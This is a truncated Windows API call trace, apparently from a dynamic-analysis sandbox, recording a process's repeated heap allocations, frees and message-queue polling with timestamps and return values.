[0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.428] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0175.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0175.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.430] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0175.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0175.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.432] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0175.435] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.435] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.435] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0175.435] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0175.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.436] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 